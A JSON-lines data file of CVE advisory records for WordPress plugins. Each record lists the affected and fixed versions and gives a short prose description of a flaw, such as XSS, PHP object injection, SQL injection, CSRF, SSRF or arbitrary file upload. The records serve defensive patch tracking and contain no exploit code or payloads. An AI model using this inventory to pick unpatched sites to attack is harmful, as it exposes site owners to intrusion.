{"CVE_ID":"CVE-2024-12600","slug":"woocommerce-custom-product-tabs-lite","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The Custom Product Tabs Lite for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.0 via deserialization of untrusted input from the 'frs_woo_product_tabs' parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-custom-product-tabs-lite\\\/trunk\\\/woocommerce-custom-product-tabs-lite.php#L372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-custom-product-tabs-lite\\\/trunk\\\/woocommerce-custom-product-tabs-lite.php#L372\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226839\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226839\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c16b47-3202-4f26-bf45-98172b8cac45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33c16b47-3202-4f26-bf45-98172b8cac45?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7388","slug":"wp-bannerize-pro","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The WP Bannerize Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via banner alt data in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba08dbad-15f9-43cf-b0d7-a2a4604cb4af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba08dbad-15f9-43cf-b0d7-a2a4604cb4af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133241\\\/wp-bannerize-pro\\\/trunk\\\/plugin\\\/CustomPostTypes\\\/WPBannerizeCustomPostType.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133241\\\/wp-bannerize-pro\\\/trunk\\\/plugin\\\/CustomPostTypes\\\/WPBannerizeCustomPostType.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11757","slug":"wp-geonames","versionImpact":"1.9.0.1","versionEndExcluding":"1.9.1","description":"The WP GeoNames plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-geonames' shortcode in all versions up to, and including, 1.9.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203122%40wp-geonames&new=3203122%40wp-geonames&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203122%40wp-geonames&new=3203122%40wp-geonames&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/930802e6-437b-437a-b530-7992094073f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/930802e6-437b-437a-b530-7992094073f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0159","slug":"extensive-vc-addon","versionEndExcluding":"1.9.1","description":"The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the PHP extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the host's file system.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/239ea870-66e5-4754-952e-74d4dd60b809\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/239ea870-66e5-4754-952e-74d4dd60b809\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5532","slug":"campus-directory","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The Campus Directory \u2013 Faculty, Staff & Student Directory Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'emd_mb_meta' shortcode in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3303022%40campus-directory&new=3303022%40campus-directory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3303022%40campus-directory&new=3303022%40campus-directory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20301685-9b76-4dd3-8185-3a4463f3201b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20301685-9b76-4dd3-8185-3a4463f3201b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4104","slug":"admin-form","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The ADFO \u2013 Custom data in admin dashboard plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dbp_id' parameter in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e61110fc-cc2d-4207-97b6-b21459334216?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e61110fc-cc2d-4207-97b6-b21459334216?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-form\\\/trunk\\\/admin\\\/class-af-list-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-form\\\/trunk\\\/admin\\\/class-af-list-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081090%40admin-form&new=3081090%40admin-form&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081090%40admin-form&new=3081090%40admin-form&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4103","slug":"admin-form","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"The ADFO \u2013 Custom data in admin dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.0. This is due to missing or incorrect nonce validation on several functions hooked via the controller() function. This makes it possible for unauthenticated attackers to edit the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081090\\\/admin-form\\\/trunk\\\/admin\\\/class-af-list-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081090\\\/admin-form\\\/trunk\\\/admin\\\/class-af-list-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d797238-f8f3-44d7-8c16-bee23ce12ae0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d797238-f8f3-44d7-8c16-bee23ce12ae0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37430","slug":"patreon-connect","versionImpact":"1.9.0","versionEndExcluding":"1.9.1","description":"Authentication Bypass by Spoofing vulnerability in Patreon Patreon WordPress allows Functionality Misuse. This issue affects Patreon WordPress: from n\/a through 1.9.0.","recommendation":"Update to version 1.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/patreon-connect\\\/wordpress-patreon-wordpress-plugin-1-9-0-image-protection-bypass-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/patreon-connect\\\/wordpress-patreon-wordpress-plugin-1-9-0-image-protection-bypass-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11972","slug":"hunk-companion","versionImpact":"1.8.5","versionEndExcluding":"1.9.0","description":"The Hunk Companion WordPress plugin before 1.9.0 does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.","recommendation":"Update to version 1.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4963560b-e4ae-451d-8f94-482779c415e4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4963560b-e4ae-451d-8f94-482779c415e4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8618","slug":"pagelayer","versionImpact":"1.8.9","versionEndExcluding":"1.9.0","description":"The Page Builder: Pagelayer WordPress plugin before 1.9.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/acddcf33-0a18-499e-b42d-c8b49f2c4de5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/acddcf33-0a18-499e-b42d-c8b49f2c4de5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11894","slug":"the-permalinker","versionImpact":"1.8.1","versionEndExcluding":"1.9.0","description":"The The Permalinker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'permalink' shortcode in all versions up to, and including, 1.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-permalinker\\\/trunk\\\/the-permalinker.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-permalinker\\\/trunk\\\/the-permalinker.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d03dbe48-371f-4fb7-8902-a013338ac7d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d03dbe48-371f-4fb7-8902-a013338ac7d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7963","slug":"cmsmasters-content-composer","versionImpact":"1.8.8","versionEndExcluding":"1.9.0","description":"The CMSMasters Content Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's multiple shortcodes in all versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42c1d2ea-dea6-4cde-8db3-37709da9eb71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42c1d2ea-dea6-4cde-8db3-37709da9eb71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"http:\\\/\\\/cmsmasters.net\\\/\",\"name\":\"http:\\\/\\\/cmsmasters.net\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4675","slug":"facebook-page-feed-graph-api","versionEndExcluding":"1.9.0","description":"The Mongoose Page Plugin WordPress plugin before 1.9.0 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21f4cc5d-c4b4-495f-acf3-9fdf53591052\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21f4cc5d-c4b4-495f-acf3-9fdf53591052\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4443","slug":"brutebank","versionEndExcluding":"1.9","description":"The BruteBank WordPress plugin before 1.9 does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e621d62-13c7-4b2f-96ca-3617a796d037\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e621d62-13c7-4b2f-96ca-3617a796d037\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4774","slug":"bit-form","versionEndExcluding":"1.9","description":"The Bit Form WordPress plugin before 1.9 does not validate the file types uploaded via its file upload form field, allowing unauthenticated users to upload arbitrary file types such as PHP or HTML files to the server, leading to Remote Code Execution.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ae5c375-a6a0-4c0b-a9ef-e4d2a28bce5e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ae5c375-a6a0-4c0b-a9ef-e4d2a28bce5e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-25117","slug":"wp-postratings","versionImpact":"1.86","versionEndExcluding":"1.86.1","description":"The WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin\/admin.php?page=wp-postratings\/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled.","recommendation":"Update to version 1.86.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2d9a789-edae-4ae1-92af-e6132db7efcd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d2d9a789-edae-4ae1-92af-e6132db7efcd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2387","slug":"advanced-form-integration","versionImpact":"1.82.0","versionEndExcluding":"1.82.6","description":"The Advanced Form Integration \u2013 Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms plugin for WordPress is vulnerable to SQL Injection via the \u2018integration_id\u2019 parameter in all versions up to, and including, 1.82.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries and subsequently inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.82.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d5a677-9b8b-4258-9cfb-101b0f0e6f6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d5a677-9b8b-4258-9cfb-101b0f0e6f6f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php#L275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php#L227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php#L227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052201%40advanced-form-integration&new=3052201%40advanced-form-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3052201%40advanced-form-integration&new=3052201%40advanced-form-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0429","slug":"gpt3-ai-content-generator","versionImpact":"1.8.96","versionEndExcluding":"1.8.97","description":"The \"AI Power: Complete AI Pack\" plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.8.96 via deserialization of untrusted input from the $form['post_content'] variable through the wpaicg_export_ai_forms() function. This allows authenticated attackers, with administrative privileges, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.8.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb927aba-a96d-47b9-ba35-60945ea5cfe5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb927aba-a96d-47b9-ba35-60945ea5cfe5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0428","slug":"gpt3-ai-content-generator","versionImpact":"1.8.96","versionEndExcluding":"1.8.97","description":"The \"AI Power: Complete AI Pack\" plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.8.96 via deserialization of untrusted input from the $form['post_content'] variable through the wpaicg_export_prompts function. This allows authenticated attackers, with administrative privileges, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.8.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66a3abc1-0508-4ce3-952b-7dbf3738879a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66a3abc1-0508-4ce3-952b-7dbf3738879a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13361","slug":"gpt3-ai-content-generator","versionImpact":"1.8.96","versionEndExcluding":"1.8.97","description":"The AI Power: Complete AI Pack plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpaicg_save_image_media function in all versions up to, and including, 1.8.96. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload image files and embed shortcode attributes in the image_alt value that will execute when sending a POST request to the attachment page.","recommendation":"Update to version 1.8.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/gpt3-ai-content-generator\\\/trunk\\\/classes\\\/wpaicg_image.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/gpt3-ai-content-generator\\\/trunk\\\/classes\\\/wpaicg_image.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11d49c89-43be-4e12-86b5-aa7a72a89803?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11d49c89-43be-4e12-86b5-aa7a72a89803?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13360","slug":"gpt3-ai-content-generator","versionImpact":"1.8.96","versionEndExcluding":"1.8.97","description":"The AI Power: Complete AI Pack plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.8.96 via the wpaicg_troubleshoot_add_vector(). This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.8.97, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224162\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf6cbba-0e0c-4d2c-90d0-d7e0a5222df2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf6cbba-0e0c-4d2c-90d0-d7e0a5222df2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10392","slug":"gpt3-ai-content-generator","versionImpact":"1.8.89","versionEndExcluding":"1.8.90","description":"The AI Power: Complete AI Pack plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handle_image_upload' function in all versions up to, and including, 1.8.89. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.8.90, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd8a45c9-ca48-4ea6-b34e-f05206f16155?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd8a45c9-ca48-4ea6-b34e-f05206f16155?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176122\\\/gpt3-ai-content-generator#file508\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176122\\\/gpt3-ai-content-generator#file508\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3234","slug":"filester","versionImpact":"1.8.8","versionEndExcluding":"1.8.9","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.8.8. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Administrators have the ability to extend file manager usage privileges to lower-level users including subscribers, which would make this vulnerability more severe on such sites.","recommendation":"Update to version 1.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3310066%40filester%2Ftrunk&old=3294389%40filester%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3310066%40filester%2Ftrunk&old=3294389%40filester%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00df02cd-b4d3-477a-86ee-aa2f9b5216e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00df02cd-b4d3-477a-86ee-aa2f9b5216e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43335","slug":"responsive-block-editor-addons","versionImpact":"1.8.8","versionEndExcluding":"1.8.9","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CyberChimps Responsive Blocks \u2013 WordPress Gutenberg Blocks allows Stored XSS. This issue affects Responsive Blocks \u2013 WordPress Gutenberg Blocks: from n\/a through 1.8.8.","recommendation":"Update to version 1.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/responsive-block-editor-addons\\\/wordpress-responsive-blocks-wordpress-gutenberg-blocks-plugin-1-8-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/responsive-block-editor-addons\\\/wordpress-responsive-blocks-wordpress-gutenberg-blocks-plugin-1-8-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11453","slug":"gs-pinterest-portfolio","versionImpact":"1.8.8","versionEndExcluding":"1.8.9","description":"The WordPress Pinterest Plugin \u2013 Make a Popup, User Profile, Masonry and Gallery Layout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_pin_widget' shortcode in all versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-pinterest-portfolio\\\/tags\\\/1.8.8\\\/includes\\\/shortcode.php#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-pinterest-portfolio\\\/tags\\\/1.8.8\\\/includes\\\/shortcode.php#L202\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200115\\\/gs-pinterest-portfolio\\\/trunk\\\/includes\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200115\\\/gs-pinterest-portfolio\\\/trunk\\\/includes\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/425cd0be-d17e-4c2b-bf29-3b850905a88e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/425cd0be-d17e-4c2b-bf29-3b850905a88e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1911","slug":"blocksy-companion","versionEndExcluding":"1.8.82","description":"The Blocksy Companion WordPress plugin before 1.8.82 does not ensure that posts to be accessed via a shortcode are already public and can be viewed, allowing any authenticated users, such as subscribers, to access draft posts for example.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7c52af0-b210-4e7d-a5e0-ee0645ddc08c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7c52af0-b210-4e7d-a5e0-ee0645ddc08c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
